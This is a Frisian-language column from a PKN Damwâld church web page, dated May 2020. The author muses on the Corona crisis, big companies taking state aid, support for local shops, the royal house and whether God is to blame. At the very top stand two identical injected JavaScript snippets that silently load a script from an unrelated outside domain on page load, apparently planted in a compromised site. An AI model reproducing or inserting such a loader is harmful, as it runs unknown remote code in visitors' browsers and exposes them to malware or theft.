;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Eigen schuld, dikke bult … - PKN Damwâld

Eigen schuld, dikke bult …

Gepubliceerd op: maandag 4 mei 2020

Wat is nog normaal en wa docht nog “gewoan” yn dizze tiid? As ik sa om mij hinne sjoch en hear, dan tink ik; wa is him- of harsels nog. Yn ús lân ha wij it measte wol goed foarelkoar, it ûnbrekt de measten fan ús oan neat en dat ha wij mei syn allen toch mar kneap dien,wier as net! Dus neat oan de hân foar safier. Mar oh hea, dan stekt der samar ynienen in stoarm oer ús op, Corona. En ja,it sil jo of de famylje mar oerkomme, siik reitsje, faaks ek nog troch in oar, of nog slimmer, jo matte it leven der by litte! Neat minder as in ramp! Sa sprekke guon fan ús ûndernimmers ek fan in ramp mar dan ha we it oer jild.Wat fernúvert mij dan; De grutsten, dy’t oars neat fan in oerheid ha matte, steane foaroan om út it rip (ruif) fan de oerheid te iten. De lytse ûndernimmer en de minima ha it soms swier te ferduorjen mar komme hast net boppe it lûd fan de oare út! Dérom,lit we soargje dat se net fersûpe en keapje lokaal.   Ek is it bûtengewoan dat ús keningshûs no sa populair is. Sels in sjoernalist fan de Volkskrant sei dat hij nei lange jierren fan miening feroare wie. It jout stabiliteit yn ús lân mei al dy populisten om ús hinne. Hoe sa, fuort mei it Keningshûs? Wér ha wij dizze stoarm no oan te “danken” tinke jo wolris, want ja, froeger “oerkaam” it ús, mar hjoeddrdei wolle wij it hoe- en-wat witte, wa wit kin we it ergens claime! Guon minsken witte it seker, it is de straf fan God. Oaren sizze, as Hij dan “bistiet”, wérom lit hij dit dan ta en “lost”dit net foar ús op? Eigenaardich, sa sei Freek de Jonge, de measten ha Him de doar út dien, [hij sels ek] wij koenen ús séls wol réde yn dit lân en no stekt der in stoarm op en ferdorie,wat dogge we; roppe oft Hij dit ek foar ús oplosse wol!

Wa wit docht aanst bliken dat wij sels de oorzaak fan it probleem west ha. Dat soe moai wêze, want dan kin we ”it” ek sels oplosse! Dus, om mei René Koster te sprekken: Moedig voorwaarts én; pas goed op elkoar!

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns